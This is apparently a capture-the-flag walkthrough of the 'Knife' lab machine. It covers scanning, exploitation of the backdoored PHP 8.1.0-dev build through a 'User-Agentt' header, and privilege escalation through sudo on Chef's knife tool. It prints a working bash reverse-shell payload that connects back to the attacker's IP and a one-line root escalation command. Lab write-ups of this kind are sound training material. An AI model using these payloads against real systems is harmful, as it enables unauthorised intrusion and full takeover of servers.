Knife

Linux · Easy

10.10.10.242

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.242

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)

Aggressive OS guesses: Linux 4.15 - 5.8 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.96 seconds

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.242    

515/udp   open|filtered printer
20279/udp open|filtered unknown

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.242

nmap found two open TCP ports, SSH (22) and HTTP (80): Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 20.04 Focal.

80/tcp open http

Apache httpd 2.4.41 ((Ubuntu)) http://10.10.10.242/

WAP: broswer

Font scripts: Google Font API Web servers: Apache HTTP Server 2.4.41 Programming languages: PHP 8.1.0 Operating systems: Ubuntu CDN: cdnjs, Cloudflare

SOURCE CODE

Read for comments view-source:http://10.10.10.242/

HEADERS BURP: browser

• Proxy: HTTP history

┌──(kali💀kali)-[~]
└─$ curl -i 10.10.10.242
HTTP/1.1 200 OK
Date: Fri, 26 Jan 2024 05:09:14 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

SCANNERS:

nikto -h https://10.10.10.242

+ Server: Apache/2.4.41 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/8.1.0-dev.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.

DIR BRUTE FORCE:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.242 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

/index.php            (Status: 200) [Size: 5815]

Shell as james

Find Exploit: The X-Powered-By header gives a very specific PHP version, PHP/8.1.0-dev. Some knowledge of the news reminds me that there was an issue with the PHP source repository where it got hacked and a backdoor was inserted (ref1, ref2, lots more).

Kind of surprisingly, on release day, Googling this version didn’t turn up the news stories about this backdoor, so it took a bit more research to figure out that this version was the one associated with the backdoor. That said, two days after Knife’s release, the top link on Google mentioned the backdoor:

┌──(kali💀kali)-[~]
└─$ searchsploit  PHP 8.1.0-dev                                        

Composr-CMS Version <=10.0.39 - Authenticated Remote Code Exec | php/webapps/51060.txt
Concrete5 CMS < 8.3.0 - Username / Comments Enumeration        | php/webapps/44194.py
cPanel < 11.25 - Cross-Site Request Forgery (Add User PHP Scri | php/webapps/17330.html
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2'  | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Co | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Co | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Co | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize( | php/remote/46510.rb
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize( | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution             | php/webapps/46459.py
FileRun < 2017.09.18 - SQL Injection                           | php/webapps/42922.py
Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities    | php/webapps/15571.txt
FreePBX < 13.0.188 - Remote Command Execution (Metasploit)     | php/remote/40434.rb
IceWarp Mail Server < 11.1.1 - Directory Traversal             | php/webapps/44587.txt
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vu | php/webapps/46956.txt
Kaltura < 13.2.0 - Remote Code Execution                       | php/webapps/43028.py
Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilitie | php/webapps/39563.txt
Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code | php/webapps/45083.rb
Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code | php/webapps/45083.rb
NPDS < 08.06 - Multiple Input Validation Vulnerabilities       | php/webapps/32689.txt
OPNsense < 19.1.1 - Cross-Site Scripting                       | php/webapps/46351.txt
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution            | php/webapps/49933.py
Plesk < 9.5.4 - Remote Command Execution                       | php/remote/25986.txt
REDCap < 9.1.2 - Cross-Site Scripting                          | php/webapps/47146.txt
Responsive FileManager < 9.13.4 - Directory Traversal          | php/webapps/45271.txt
Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure    | php/webapps/41272.txt
ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilit | php/webapps/46666.txt
Western Digital Arkeia < 10.0.10 - Remote Code Execution (Meta | php/remote/28407.rb
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabil | php/webapps/39553.txt
Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross- | php/webapps/46815.txt


PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution            | php/webapps/49933.py

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 49933.py
  Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49933
     Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
    Codes: N/A
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/49933.py

Backdoor Details: Because of how GitHub and open-source works, I can look right at the commit that adds this backdoor into the PHP codebase. The commit changes one file, ext/zlib/zlib.c, adding 11 lines of code (all in green): https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d

It’s fascinating to see others commenting on the commit, the first comment asking if the misspelling of HTTP_USER_AGENT as HTTP_USER_AGENTT was a mistake, and four lines later someone asking what it did, and someone else responding basically that’s it’s a backdoor, and how it works.

RCE: To test this, I’ll send the GET request over to Burp Repeater and replace the User-Agent header with the malicious one:

User-Agentt: zerodium system("bash -c 'bash -i >& /dev/tcp/10.10.16.6/1337 0>&1'");

GET / HTTP/1.1
Host: 10.10.10.242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
User-Agentt: zerodium system("bash -c 'bash -i >& /dev/tcp/10.10.16.6/1337 0>&1'");
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

SHELL: I’ll replace id with a reverse shell, and run it again.

┌──(kali💀kali)-[~]
└─$ sudo nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.242] 55154
bash: cannot set terminal process group (963): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ whoami
james

james@knife:/$ cd ~

james@knife:~$ ls
user.txt

james@knife:~$ cat user.txt
de9b97--------------------------

james@knife:~$ id
uid=1000(james) gid=1000(james) groups=1000(james)

james@knife:~$ python3 -c 'import pty;pty.spawn("bash")'
python3 -c 'import pty;pty.spawn("bash")'

Shell as root

Enumeration: When trying to escalate on Linux, always check sudo -l:

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

james can run knife as root.

Background: Chef is an automation/infrastructure platform:

Platform Overviewdocs.chef.io

knife is a command line tool manage Chef. According to the docs, it manages aspects of Chef such as:

SHELL: While GTFObins has a page for knife, it didn’t when Knife released, leaving me to comb the docs. There are several ways to get execution through knife.

knife | GTFOBinsgtfobins.github.io

exec More simply, knife has an exec command that will run Ruby code. This is the technique now on GTFObins, but it wasn’t there when Knife released. There was a GTFObins page on Ruby that shows running sudo ruby -e 'exec "/bin/sh"'. The Ruby code there is exec "/bin/sh". Using the same Ruby code here works:

knife execdocs.chef.io

ruby | GTFOBinsgtfobins.github.io

james@knife:~$ sudo knife exec -E "exec '/bin/bash'" 
sudo knife exec -E "exec '/bin/bash'" 
root@knife:/home/james#

root@knife:~# ls
delete.sh  root.txt  snap

root@knife:~# cat root.txt
cat root.txt
a62723---------------------------